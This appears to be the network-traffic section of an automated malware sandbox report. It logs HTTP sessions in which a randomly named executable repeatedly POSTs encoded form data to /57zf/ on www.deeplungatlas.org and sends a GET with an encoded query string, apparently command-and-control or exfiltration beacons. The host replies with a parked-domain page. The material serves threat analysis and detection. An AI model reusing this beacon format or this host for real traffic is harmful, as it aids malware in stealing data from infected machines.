                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.749981194.9.94.85801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:26.259960890 CET622OUTPOST /57zf/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.deeplungatlas.org
                                                              Origin: http://www.deeplungatlas.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.deeplungatlas.org/57zf/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 63 51 2f 6a 73 52 74 67 74 78 77 67 46 63 56 6b 51 4d 4a 55 50 57 4c 72 33 6c 64 5a 35 44 31 41 59 4f 36 6d 74 74 37 7a 5a 69 54 4f 57 62 35 37 31 4a 67 73 4d 31 54 75 65 49 6d 38 42 4b 2b 41 6c 44 69 70 6a 54 31 76 58 77 64 66 58 4d 46 76 37 56 4b 4d 31 59 61 4a 5a 4f 76 63 4c 6e 73 59 66 4b 70 64 43 51 39 46 77 4a 33 54 77 6a 57 4d 47 79 77 53 78 47 4e 38 49 59 4e 46 4f 67 44 45 62 36 76 77 38 6c 39 32 6d 55 68 4c 50 6b 72 73 66 6a 39 7a 72 74 75 58 4a 51 32 6a 6c 43 67 62 47 33 2f 38 61 68 43 6a 6b 37 76 72 35 51 45 6a 74 64 4b 75 56 7a 7a 4f 47 56 70 43 73 54 7a 63 6c 52 7a 63 76 6a 36 67 69 4f 45 59 71 75 50 70 76 77 3d 3d
                                                              Data Ascii: ZtwlQ=cQ/jsRtgtxwgFcVkQMJUPWLr3ldZ5D1AYO6mtt7zZiTOWb571JgsM1TueIm8BK+AlDipjT1vXwdfXMFv7VKM1YaJZOvcLnsYfKpdCQ9FwJ3TwjWMGywSxGN8IYNFOgDEb6vw8l92mUhLPkrsfj9zrtuXJQ2jlCgbG3/8ahCjk7vr5QEjtdKuVzzOGVpCsTzclRzcvj6giOEYquPpvw==
                                                              Nov 12, 2024 15:31:27.110738993 CET1236INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:31:26 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: PHP/8.1.29
                                                              Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                              Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                              Nov 12, 2024 15:31:27.110759020 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                              Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                              Nov 12, 2024 15:31:27.110773087 CET1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                              Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                              Nov 12, 2024 15:31:27.111051083 CET1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                              Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                              Nov 12, 2024 15:31:27.111063957 CET878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                                              Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.749982194.9.94.85801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:28.827096939 CET642OUTPOST /57zf/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.deeplungatlas.org
                                                              Origin: http://www.deeplungatlas.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.deeplungatlas.org/57zf/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 63 51 2f 6a 73 52 74 67 74 78 77 67 48 34 70 6b 41 66 52 55 59 47 4c 71 72 31 64 5a 69 7a 31 45 59 4f 32 6d 74 6f 66 6a 61 57 2f 4f 58 2b 46 37 30 4e 30 73 50 31 54 75 56 6f 6d 44 4d 71 2b 78 6c 45 71 58 6a 51 74 76 58 77 5a 66 58 4a 68 76 36 6a 43 50 31 49 61 4c 57 75 76 65 57 33 73 59 66 4b 70 64 43 51 5a 76 77 4a 76 54 77 7a 6d 4d 55 44 77 54 79 47 4e 2f 42 34 4e 46 4b 67 44 41 62 36 76 43 38 6e 4a 51 6d 58 5a 4c 50 6b 37 73 47 58 52 77 6c 64 75 52 58 67 33 47 6a 48 4e 6f 4f 55 75 4f 64 52 65 74 72 70 33 67 78 47 46 42 33 2f 47 43 4c 69 4c 31 43 58 4e 30 37 31 75 70 6e 51 33 45 69 42 4f 42 39 35 68 79 6e 38 75 74 35 50 51 4b 50 2f 49 4c 47 52 7a 45 56 38 64 32 76 68 55 67 39 48 49 3d
                                                              Data Ascii: ZtwlQ=cQ/jsRtgtxwgH4pkAfRUYGLqr1dZiz1EYO2mtofjaW/OX+F70N0sP1TuVomDMq+xlEqXjQtvXwZfXJhv6jCP1IaLWuveW3sYfKpdCQZvwJvTwzmMUDwTyGN/B4NFKgDAb6vC8nJQmXZLPk7sGXRwlduRXg3GjHNoOUuOdRetrp3gxGFB3/GCLiL1CXN071upnQ3EiBOB95hyn8ut5PQKP/ILGRzEV8d2vhUg9HI=
                                                              Nov 12, 2024 15:31:29.646936893 CET1236INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:31:29 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: PHP/8.1.29
                                                              Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                              Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                              Nov 12, 2024 15:31:29.646962881 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                              Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                              Nov 12, 2024 15:31:29.646977901 CET1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                              Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                              Nov 12, 2024 15:31:29.646991014 CET1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                              Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                              Nov 12, 2024 15:31:29.647005081 CET848INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                                              Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                                                              Nov 12, 2024 15:31:29.647017002 CET30INData Raw: 6e 74 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: nt --></body></html>0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.749983194.9.94.85801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:31.371136904 CET1655OUTPOST /57zf/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.deeplungatlas.org
                                                              Origin: http://www.deeplungatlas.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.deeplungatlas.org/57zf/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 63 51 2f 6a 73 52 74 67 74 78 77 67 48 34 70 6b 41 66 52 55 59 47 4c 71 72 31 64 5a 69 7a 31 45 59 4f 32 6d 74 6f 66 6a 61 57 33 4f 57 4d 39 37 30 71 59 73 4f 31 54 75 63 49 6d 43 4d 71 2b 73 6c 46 4f 4c 6a 51 67 4e 58 32 46 66 57 71 5a 76 79 32 69 50 37 49 61 4c 64 4f 76 66 4c 6e 73 33 66 4b 34 55 43 51 70 76 77 4a 76 54 77 77 75 4d 44 43 77 54 30 47 4e 38 49 59 4e 7a 4f 67 44 34 62 36 48 53 38 6b 6c 41 6e 6d 35 4c 4d 46 4c 73 64 45 70 77 6a 4e 75 54 57 67 33 6b 6a 48 4a 33 4f 55 44 33 64 53 44 34 72 70 66 67 67 47 49 67 76 50 47 6a 56 77 44 77 49 45 34 53 30 6b 43 66 6d 53 7a 7a 70 7a 6d 67 31 75 56 48 76 4d 58 68 33 70 4d 4a 4e 70 77 55 64 77 76 30 59 72 55 44 31 78 38 47 6d 53 55 43 30 54 71 66 6b 56 44 78 6c 41 59 4a 63 58 74 46 76 58 6e 42 6a 64 57 67 5a 50 4f 39 77 67 51 59 6c 79 66 41 71 36 4b 7a 5a 74 63 36 31 43 32 6a 69 41 54 79 34 37 48 41 67 61 5a 45 31 65 6c 51 2b 45 49 48 73 48 42 43 6d 4c 57 36 42 74 68 64 4c 7a 34 6d 47 37 48 41 42 71 6c 48 75 38 78 67 2b 49 33 79 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=cQ/jsRtgtxwgH4pkAfRUYGLqr1dZiz1EYO2mtofjaW3OWM970qYsO1TucImCMq+slFOLjQgNX2FfWqZvy2iP7IaLdOvfLns3fK4UCQpvwJvTwwuMDCwT0GN8IYNzOgD4b6HS8klAnm5LMFLsdEpwjNuTWg3kjHJ3OUD3dSD4rpfggGIgvPGjVwDwIE4S0kCfmSzzpzmg1uVHvMXh3pMJNpwUdwv0YrUD1x8GmSUC0TqfkVDxlAYJcXtFvXnBjdWgZPO9wgQYlyfAq6KzZtc61C2jiATy47HAgaZE1elQ+EIHsHBCmLW6BthdLz4mG7HABqlHu8xg+I3yxV9teRIyeyhKsdv3OEtdA7dc2PiHFPdjUO+odOunimjdaxU8onBj0bSxR8Q9Kj+2VxozF2A97LHkLrWI60y+3v8/h0k/TSX5ZSmqSWUAUpUFD/O4UHPsf6YRDIYymeR4bN+/4IWyPoO/zjGTc48uhJahI+vfjlxpgESGYNNqYldmuBAGfoqVVhlUdAPSAAw/THyrFG32N1FPOvFgcDehJRR5baP3g1jO41u3X/Ij6EyQMXsOpWQYDY7H0mrzD6khaHaKgPjBqWwkD4qjQ8B9PSuLUx0hGlAZhG1B2cCbSnIufcMJfFhv3KqXGhTUSshojBpndmkI/NMQjvQo1C2Q5+H0RIfkHidMiBxmHhaDzxx0MXXCVWj+MCb7FCXrrgsQFHK3qym6/AMjyhRmeek/n9rOnvq6vhOUZeMD+LckMmayB+7tDTvJVbKuO0zYSlVO3aL7PtoQZjYM5va3HeDxRfxH6anKgXrUZoWpU6VfSn3T8vscHcyuwwEK+P8FD0ZrdVeoMGHTWIoSQV6AR9dg/fbnv3GJ/A534yBOa6mCOGnSNmBuamAReLfwIoOKhuAN7nhb2r/GY8ChhK8nLLN/mZONUQbB71ahYkB2AIwCZgZKvXmxQ227bvLVxO8wFLCTpIocrq/pudMoei+URmR4BupwuNvC58ODI4 [TRUNCATED]
                                                              Nov 12, 2024 15:31:32.234817028 CET1236INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:31:32 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: PHP/8.1.29
                                                              Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                              Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                              Nov 12, 2024 15:31:32.234837055 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                              Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                              Nov 12, 2024 15:31:32.234849930 CET424INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                              Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                              Nov 12, 2024 15:31:32.234863043 CET1236INData Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c
                                                              Data Ascii: <div class="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainna
                                                              Nov 12, 2024 15:31:32.234877110 CET1236INData Raw: 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 64 6e 73 22 3e 52 65 61 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69
                                                              Data Ascii: web&utm_content=dns">Read more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need
                                                              Nov 12, 2024 15:31:32.234889030 CET454INData Raw: 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67
                                                              Data Ascii: ><a href="https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https:/


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.749984194.9.94.85801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:33.913113117 CET345OUTGET /57zf/?ZtwlQ=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmiwp/JS/jJT11lfoMCLi5cvamonTeSDCRL83RdCYlcDH7pRdqC9V4SuntT&ZX=G2OXK HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.deeplungatlas.org
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:31:34.753211021 CET1236INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:31:34 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: PHP/8.1.29
                                                              Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 